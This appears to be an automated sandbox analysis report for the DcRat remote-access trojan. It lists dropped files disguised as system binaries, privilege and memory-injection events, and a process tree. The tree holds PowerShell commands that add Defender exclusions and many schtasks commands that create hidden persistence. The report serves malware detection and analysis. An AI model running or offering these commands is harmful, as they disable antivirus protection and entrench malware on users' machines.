File created	C:\Windows\winsxs\wow64_microsoft-windows-i..l-keyboard-00000481_31bf3856ad364e35_6.1.7601.17514_none_4fbc1dccaf38d2ce\Realtek HD Audio Universal Service.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\AppCompat\Programs\audiodg.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\AppCompat\Programs\42af1c969fbb7b	Realtek HD Audio Universal Service.exe
File opened for modification	C:\Windows\Prefetch\ReadyBoot\System.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\Prefetch\ReadyBoot\27d1bcfc3c54e0	Realtek HD Audio Universal Service.exe
File created	C:\Windows\ModemLogs\1a118449e3bb0d	Realtek HD Audio Universal Service.exe
File created	C:\Windows\RemotePackages\RemoteDesktops\6203df4a6bafc7	Realtek HD Audio Universal Service.exe
File created	C:\Windows\Prefetch\ReadyBoot\System.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\AppPatch\Custom\cc11b995f2a76d	Realtek HD Audio Universal Service.exe
File created	C:\Windows\ModemLogs\Realtek HD Audio Universal Service.exe	Realtek HD Audio Universal Service.exe
File created	C:\Windows\SoftwareDistribution\ScanFile\3a6fe29a7ceee6	Realtek HD Audio Universal Service.exe
File created	C:\Windows\RemotePackages\RemoteDesktops\lsass.exe	Realtek HD Audio Universal Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
640	schtasks.exe
2616	schtasks.exe
2168	schtasks.exe
2156	schtasks.exe
1604	schtasks.exe
2360	schtasks.exe
2380	schtasks.exe
1892	schtasks.exe
2224	schtasks.exe
2968	schtasks.exe
1412	schtasks.exe
948	schtasks.exe
2904	schtasks.exe
2332	schtasks.exe
1872	schtasks.exe
1680	schtasks.exe
1536	schtasks.exe
568	schtasks.exe
2656	schtasks.exe
2148	schtasks.exe
580	schtasks.exe
1436	schtasks.exe
1428	schtasks.exe
1560	schtasks.exe
2676	schtasks.exe
1244	schtasks.exe
640	schtasks.exe
2496	schtasks.exe
2256	schtasks.exe
992	schtasks.exe
1712	schtasks.exe
1544	schtasks.exe
2112	schtasks.exe
1056	schtasks.exe
1556	schtasks.exe
772	schtasks.exe
1664	schtasks.exe
1696	schtasks.exe
872	schtasks.exe
1988	schtasks.exe
3056	schtasks.exe
2404	schtasks.exe
1872	schtasks.exe
2716	schtasks.exe
2028	schtasks.exe
1944	schtasks.exe
2324	schtasks.exe
2708	schtasks.exe
2572	schtasks.exe
2548	schtasks.exe
856	schtasks.exe
2032	schtasks.exe
2568	schtasks.exe
816	schtasks.exe
2528	schtasks.exe
2980	schtasks.exe
2828	schtasks.exe
1012	schtasks.exe
1444	schtasks.exe
2052	schtasks.exe
1644	schtasks.exe
1124	schtasks.exe
2164	schtasks.exe
808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
2752	Updata.exe
2752	Updata.exe
2752	Updata.exe
1376	Realtek HD Audio Universal Service.exe
1376	Realtek HD Audio Universal Service.exe
1376	Realtek HD Audio Universal Service.exe
1376	Realtek HD Audio Universal Service.exe
1376	Realtek HD Audio Universal Service.exe
2620	Realtek HD Audio Universal Service.exe
1808	powershell.exe
3020	powershell.exe
2756	powershell.exe
1508	powershell.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2612	javaw.exe Java(TM) Platform SE binary.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
2020	Realtek HD Audio Universal Service.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe
808	System.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
808	System.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2612	javaw.exe Java(TM) Platform SE binary.exe
Token: SeDebugPrivilege	2752	Updata.exe
Token: SeDebugPrivilege	1376	Realtek HD Audio Universal Service.exe
Token: SeDebugPrivilege	2620	Realtek HD Audio Universal Service.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2020	Realtek HD Audio Universal Service.exe
Token: SeDebugPrivilege	2612	javaw.exe Java(TM) Platform SE binary.exe
Token: SeDebugPrivilege	808	System.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2612	javaw.exe Java(TM) Platform SE binary.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2936	2852	installer.exe	28
PID 2852 wrote to memory of 2612	2852	installer.exe	29
PID 2852 wrote to memory of 2612	2852	installer.exe	29
PID 2852 wrote to memory of 2612	2852	installer.exe	29
PID 2852 wrote to memory of 2612	2852	installer.exe	29
PID 2852 wrote to memory of 2752	2852	installer.exe	30
PID 2852 wrote to memory of 2752	2852	installer.exe	30
PID 2852 wrote to memory of 2752	2852	installer.exe	30
PID 2852 wrote to memory of 2752	2852	installer.exe	30
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2936 wrote to memory of 2596	2936	Realtek HD Audio Universal Service.exe	31
PID 2752 wrote to memory of 2196	2752	Updata.exe	32
PID 2752 wrote to memory of 2196	2752	Updata.exe	32
PID 2752 wrote to memory of 2196	2752	Updata.exe	32
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 2596 wrote to memory of 1628	2596	WScript.exe	33
PID 1628 wrote to memory of 1376	1628	cmd.exe	35
PID 1628 wrote to memory of 1376	1628	cmd.exe	35
PID 1628 wrote to memory of 1376	1628	cmd.exe	35
PID 1628 wrote to memory of 1376	1628	cmd.exe	35
PID 1376 wrote to memory of 2620	1376	Realtek HD Audio Universal Service.exe	82
PID 1376 wrote to memory of 2620	1376	Realtek HD Audio Universal Service.exe	82
PID 1376 wrote to memory of 2620	1376	Realtek HD Audio Universal Service.exe	82
PID 2620 wrote to memory of 3036	2620	Realtek HD Audio Universal Service.exe	95
PID 2620 wrote to memory of 3036	2620	Realtek HD Audio Universal Service.exe	95
PID 2620 wrote to memory of 3036	2620	Realtek HD Audio Universal Service.exe	95
PID 3036 wrote to memory of 648	3036	cmd.exe	97
PID 3036 wrote to memory of 648	3036	cmd.exe	97
PID 3036 wrote to memory of 648	3036	cmd.exe	97
PID 2612 wrote to memory of 1808	2612	javaw.exe Java(TM) Platform SE binary.exe	98
PID 2612 wrote to memory of 1808	2612	javaw.exe Java(TM) Platform SE binary.exe	98
PID 2612 wrote to memory of 1808	2612	javaw.exe Java(TM) Platform SE binary.exe	98
PID 2612 wrote to memory of 3020	2612	javaw.exe Java(TM) Platform SE binary.exe	100
PID 2612 wrote to memory of 3020	2612	javaw.exe Java(TM) Platform SE binary.exe	100
PID 2612 wrote to memory of 3020	2612	javaw.exe Java(TM) Platform SE binary.exe	100
PID 2612 wrote to memory of 2756	2612	javaw.exe Java(TM) Platform SE binary.exe	102
PID 2612 wrote to memory of 2756	2612	javaw.exe Java(TM) Platform SE binary.exe	102
PID 2612 wrote to memory of 2756	2612	javaw.exe Java(TM) Platform SE binary.exe	102
PID 2612 wrote to memory of 1508	2612	javaw.exe Java(TM) Platform SE binary.exe	104
PID 2612 wrote to memory of 1508	2612	javaw.exe Java(TM) Platform SE binary.exe	104
PID 2612 wrote to memory of 1508	2612	javaw.exe Java(TM) Platform SE binary.exe	104
PID 3036 wrote to memory of 2020	3036	cmd.exe	106
PID 3036 wrote to memory of 2020	3036	cmd.exe	106
PID 3036 wrote to memory of 2020	3036	cmd.exe	106
PID 2020 wrote to memory of 2328	2020	Realtek HD Audio Universal Service.exe	152
PID 2020 wrote to memory of 2328	2020	Realtek HD Audio Universal Service.exe	152
PID 2020 wrote to memory of 2328	2020	Realtek HD Audio Universal Service.exe	152
PID 2328 wrote to memory of 1840	2328	cmd.exe	154

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
  "C:\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\bridgeHyperCrt\FOAEdrh1BxsF.vbe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\bridgeHyperCrt\OI0pwrYEs8WKMbQhaocS5DTAkNJim.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe
        
        "C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe"
        5⤵
        DcRat
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1376
      - C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe
        
        "C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\W8DBmfjgM5.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3036
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:648
        
        C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe
        
        "C:\bridgeHyperCrt\Realtek HD Audio Universal Service.exe"
        8⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2020
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FcQJYipO6s.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2328
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        10⤵
        
        PID:1840
        
        C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe
        
        "C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe"
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:808
- C:\Users\Admin\AppData\Local\Temp\javaw.exe Java(TM) Platform SE binary.exe
  "C:\Users\Admin\AppData\Local\Temp\javaw.exe Java(TM) Platform SE binary.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\javaw.exe Java(TM) Platform SE binary.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'javaw.exe Java(TM) Platform SE binary.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\javaw.exe Java(TM) Platform SE binary.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'javaw.exe Java(TM) Platform SE binary.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- C:\Users\Admin\AppData\Local\Temp\Updata.exe
  "C:\Users\Admin\AppData\Local\Temp\Updata.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2752 -s 1188
    3⤵
    PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Windows\Prefetch\ReadyBoot\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\Prefetch\ReadyBoot\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\fr-FR\javaw.exe Java(TM) Platform SE binary.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binary" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\fr-FR\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\fr-FR\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\cmd.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\cmd.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 9 /tr "'C:\bridgeHyperCrt\javaw.exe Java(TM) Platform SE binary.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:3000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binary" /sc ONLOGON /tr "'C:\bridgeHyperCrt\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 9 /tr "'C:\bridgeHyperCrt\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\javaw.exe Java(TM) Platform SE binary.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binary" /sc ONLOGON /tr "'C:\Program Files\Windows NT\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "javaw.exe Java(TM) Platform SE binaryj" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\javaw.exe Java(TM) Platform SE binary.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\AppPatch\Custom\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\AppPatch\Custom\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\AppPatch\Custom\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\bridgeHyperCrt\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\bridgeHyperCrt\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\bridgeHyperCrt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Journal\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "UpdataU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Updata.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Updata" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Updata.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "UpdataU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Updata.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Realtek HD Audio Universal ServiceR" /sc MINUTE /mo 8 /tr "'C:\Windows\ModemLogs\Realtek HD Audio Universal Service.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Realtek HD Audio Universal Service" /sc ONLOGON /tr "'C:\Windows\ModemLogs\Realtek HD Audio Universal Service.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Realtek HD Audio Universal ServiceR" /sc MINUTE /mo 9 /tr "'C:\Windows\ModemLogs\Realtek HD Audio Universal Service.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 12 /tr "'C:\bridgeHyperCrt\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\bridgeHyperCrt\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\bridgeHyperCrt\schtasks.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Local Settings\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Local Settings\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\bridgeHyperCrt\WmiPrvSE.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\bridgeHyperCrt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\bridgeHyperCrt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1064

C:\Windows\system32\schtasks.exe
